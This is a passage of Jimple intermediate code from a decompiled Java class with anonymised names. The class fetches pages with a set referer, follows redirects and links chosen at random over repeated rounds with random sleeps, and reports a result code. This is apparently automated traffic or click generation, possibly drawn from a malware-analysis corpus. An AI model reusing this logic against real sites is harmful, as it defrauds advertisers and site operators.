        specialinvoke r0.<com.xxx.yyy.BBBB: void SleepTime(int,int)>(5, 15);
        $i15 = virtualinvoke r2.<java.lang.String: int length()>();
        if $i15 <= 0 goto label13;

        $r22 = r0.<com.xxx.yyy.BBBB: java.lang.String refer>;
        r12 = specialinvoke r0.<com.xxx.yyy.BBBB: java.lang.String HppGet(java.lang.String,java.lang.String)>(r2, $r22);
        $r23 = r0.<com.xxx.yyy.BBBB: java.lang.String redirectUrl>;
        $i16 = virtualinvoke $r23.<java.lang.String: int length()>();
        if $i16 <= 0 goto label7;

        r2 = r0.<com.xxx.yyy.BBBB: java.lang.String redirectUrl>;
        r0.<com.xxx.yyy.BBBB: java.lang.String redirectUrl> = "";

     label7:
        $i17 = virtualinvoke r12.<java.lang.String: int length()>();
        if $i17 != 0 goto label12;

        r0.<com.xxx.yyy.BBBB: int result> = 5;
        z0 = 0;

     label8:
        specialinvoke r0.<com.xxx.yyy.BBBB: void SleepTime(int,int)>(5, 15);

     label9:
        if z0 == 0 goto label10;

        $i18 = r0.<com.xxx.yyy.BBBB: int randomDoCount>;
        if $i18 <= 0 goto label10;

        $i19 = virtualinvoke r12.<java.lang.String: int length()>();
        if $i19 > 0 goto label15;

     label10:
        $i20 = r0.<com.xxx.yyy.BBBB: int result>;
        specialinvoke r0.<com.xxx.yyy.BBBB: void PostResult(int)>($i20);
        $r24 = r0.<com.xxx.yyy.BBBB: java.util.List urls>;
        interfaceinvoke $r24.<java.util.List: void clear()>();
        $r25 = r0.<com.xxx.yyy.BBBB: org.apache.http.impl.client.DefaultHttpClient httpClient>;
        $r26 = virtualinvoke $r25.<org.apache.http.impl.client.DefaultHttpClient: org.apache.http.conn.ClientConnectionManager getConnectionManager()>();
        interfaceinvoke $r26.<org.apache.http.conn.ClientConnectionManager: void shutdown()>();

     label11:
        return;

     label12:
        z0 = 1;
        goto label8;

     label13:
        $i21 = r0.<com.xxx.yyy.BBBB: int dotype>;
        if $i21 != 3 goto label14;

        r0.<com.xxx.yyy.BBBB: int result> = 3;
        z0 = 0;
        goto label8;

     label14:
        r0.<com.xxx.yyy.BBBB: int result> = 4;
        z0 = 0;
        goto label8;

     label15:
        $r27 = specialinvoke r0.<com.xxx.yyy.BBBB: java.lang.String FindHttpHead(java.lang.String,java.lang.String)>(r12, r2);
        $r28 = r0.<com.xxx.yyy.BBBB: java.util.List urls>;
        interfaceinvoke $r28.<java.util.List: void clear()>();
        specialinvoke r0.<com.xxx.yyy.BBBB: void FixUrls(java.lang.String,java.lang.String)>(r12, $r27);
        $r29 = r0.<com.xxx.yyy.BBBB: java.util.List urls>;
        $i22 = interfaceinvoke $r29.<java.util.List: int size()>();
        if $i22 <= 0 goto label18;

        $r30 = r0.<com.xxx.yyy.BBBB: java.util.List urls>;
        $i23 = interfaceinvoke $r30.<java.util.List: int size()>();
        $i24 = 1 + $i23;
        i25 = specialinvoke r0.<com.xxx.yyy.BBBB: int GetRandomFromMinToMax(int,int)>(-1, $i24);
        if i25 < 0 goto label16;

        $r31 = r0.<com.xxx.yyy.BBBB: java.util.List urls>;
        $i26 = interfaceinvoke $r31.<java.util.List: int size()>();
        $i27 = $i26 - 1;
        if i25 <= $i27 goto label17;

     label16:
        i25 = 0;

     label17:
        $r32 = r0.<com.xxx.yyy.BBBB: java.util.List urls>;
        $r33 = interfaceinvoke $r32.<java.util.List: java.lang.Object get(int)>(i25);
        r2 = (java.lang.String) $r33;
        $r34 = r0.<com.xxx.yyy.BBBB: java.lang.String refer>;
        r12 = specialinvoke r0.<com.xxx.yyy.BBBB: java.lang.String HppGet(java.lang.String,java.lang.String)>(r2, $r34);
        $r35 = r0.<com.xxx.yyy.BBBB: java.lang.String redirectUrl>;
        $i28 = virtualinvoke $r35.<java.lang.String: int length()>();
        if $i28 <= 0 goto label18;

        r2 = r0.<com.xxx.yyy.BBBB: java.lang.String redirectUrl>;
        r0.<com.xxx.yyy.BBBB: java.lang.String redirectUrl> = "";

     label18:
        $i29 = r0.<com.xxx.yyy.BBBB: int randomDoCount>;
        $i30 = $i29 - 1;
        r0.<com.xxx.yyy.BBBB: int randomDoCount> = $i30;
        specialinvoke r0.<com.xxx.yyy.BBBB: void SleepTime(int,int)>(5, 15);
        goto label9;
    }

    public java.lang.String generateString(java.io.InputStream)
    {
        com.xxx.yyy.BBBB r0;
        java.io.InputStream r1;
        java.io.InputStreamReader $r2;
        java.lang.StringBuilder r3;
        java.lang.String r4, $r6;
        java.io.BufferedReader r5;
        java.io.IOException $r8, $r9;

        r0 := @this: com.xxx.yyy.BBBB;
        r1 := @parameter0: java.io.InputStream;
        r5 = new java.io.BufferedReader;
        $r2 = new java.io.InputStreamReader;
        specialinvoke $r2.<java.io.InputStreamReader: void <init>(java.io.InputStream)>(r1);
        specialinvoke r5.<java.io.BufferedReader: void <init>(java.io.Reader)>($r2);
        r3 = new java.lang.StringBuilder;
        specialinvoke r3.<java.lang.StringBuilder: void <init>()>();

     label0:
        r4 = virtualinvoke r5.<java.io.BufferedReader: java.lang.String readLine()>();

     label1:
        if r4 != null goto label4;

     label2:
        virtualinvoke r1.<java.io.InputStream: void close()>();

     label3:
        $r6 = virtualinvoke r3.<java.lang.StringBuilder: java.lang.String toString()>();
        return $r6;

     label4:
        virtualinvoke r3.<java.lang.StringBuilder: java.lang.StringBuilder append(java.lang.String)>(r4);

     label5:
        goto label0;

     label6:
        $r8 := @caughtexception;
        virtualinvoke $r8.<java.io.IOException: void printStackTrace()>();
        goto label2;

     label7:
        $r9 := @caughtexception;
        virtualinvoke $r9.<java.io.IOException: void printStackTrace()>();
        goto label3;

        catch java.io.IOException from label0 to label1 with label6;
        catch java.io.IOException from label2 to label3 with label7;
        catch java.io.IOException from label4 to label5 with label6;
    }

    public java.lang.String generateString(java.io.InputStream, java.lang.String) throws java.io.UnsupportedEncodingException
    {
        com.xxx.yyy.BBBB r0;
        java.io.InputStream r1;
        java.lang.String r2, r6, $r7;
        java.io.InputStreamReader $r3;
        java.lang.StringBuilder r4;
        java.io.BufferedReader r5;
        java.io.IOException $r9, $r10;

        r0 := @this: com.xxx.yyy.BBBB;
        r1 := @parameter0: java.io.InputStream;
        r2 := @parameter1: java.lang.String;
        r5 = new java.io.BufferedReader;
        $r3 = new java.io.InputStreamReader;
        specialinvoke $r3.<java.io.InputStreamReader: void <init>(java.io.InputStream,java.lang.String)>(r1, r2);
        specialinvoke r5.<java.io.BufferedReader: void <init>(java.io.Reader)>($r3);
        r4 = new java.lang.StringBuilder;
        specialinvoke r4.<java.lang.StringBuilder: void <init>()>();

     label0:
        r6 = virtualinvoke r5.<java.io.BufferedReader: java.lang.String readLine()>();

     label1:
        if r6 != null goto label4;

     label2:
        virtualinvoke r1.<java.io.InputStream: void close()>();

     label3:
        $r7 = virtualinvoke r4.<java.lang.StringBuilder: java.lang.String toString()>();
        return $r7;

     label4:
        virtualinvoke r4.<java.lang.StringBuilder: java.lang.StringBuilder append(java.lang.String)>(r6);

     label5:
        goto label0;

     label6:
        $r9 := @caughtexception;
        virtualinvoke $r9.<java.io.IOException: void printStackTrace()>();
        goto label2;

     label7:
        $r10 := @caughtexception;
        virtualinvoke $r10.<java.io.IOException: void printStackTrace()>();
        goto label3;

        catch java.io.IOException from label0 to label1 with label6;
        catch java.io.IOException from label2 to label3 with label7;
        catch java.io.IOException from label4 to label5 with label6;
    }

    public java.lang.String getContentCharset(org.apache.http.HttpResponse)
    {
        com.xxx.yyy.BBBB r0;
        org.apache.http.HttpResponse r1;
        java.lang.String r2, r5;
        org.apache.http.HttpEntity $r3;
        org.apache.http.Header r4;
        boolean $z0, $z1, $z2;

        r0 := @this: com.xxx.yyy.BBBB;
        r1 := @parameter0: org.apache.http.HttpResponse;
        r2 = "ISO_8859-1";
        $r3 = interfaceinvoke r1.<org.apache.http.HttpResponse: org.apache.http.HttpEntity getEntity()>();
        r4 = interfaceinvoke $r3.<org.apache.http.HttpEntity: org.apache.http.Header getContentType()>();
        if r4 == null goto label0;

        r5 = interfaceinvoke r4.<org.apache.http.Header: java.lang.String getValue()>();
        $z0 = virtualinvoke r0.<com.xxx.yyy.BBBB: boolean matcher(java.lang.String,java.lang.String)>(r5, "(charset)\\s?=\\s?(utf-?8)");
        if $z0 == 0 goto label1;

        r2 = "utf-8";

     label0:
        return r2;

     label1:
        $z1 = virtualinvoke r0.<com.xxx.yyy.BBBB: boolean matcher(java.lang.String,java.lang.String)>(r5, "(charset)\\s?=\\s?(gbk)");
        if $z1 == 0 goto label2;

        return "gbk";

     label2:
        $z2 = virtualinvoke r0.<com.xxx.yyy.BBBB: boolean matcher(java.lang.String,java.lang.String)>(r5, "(charset)\\s?=\\s?(gb2312)");
        if $z2 == 0 goto label0;

        return "gb2312";
    }

    public boolean matcher(java.lang.String, java.lang.String)
    {
        com.xxx.yyy.BBBB r0;
        java.lang.String r1, r2;
        java.util.regex.Pattern $r3;
        java.util.regex.Matcher $r4;
        boolean $z0;

        r0 := @this: com.xxx.yyy.BBBB;
        r1 := @parameter0: java.lang.String;
        r2 := @parameter1: java.lang.String;
        $r3 = staticinvoke <java.util.regex.Pattern: java.util.regex.Pattern compile(java.lang.String,int)>(r2, 66);
        $r4 = virtualinvoke $r3.<java.util.regex.Pattern: java.util.regex.Matcher matcher(java.lang.CharSequence)>(r1);
        $z0 = virtualinvoke $r4.<java.util.regex.Matcher: boolean find()>();
        if $z0 == 0 goto label0;

        return 1;

     label0:
        return 0;
    }
}
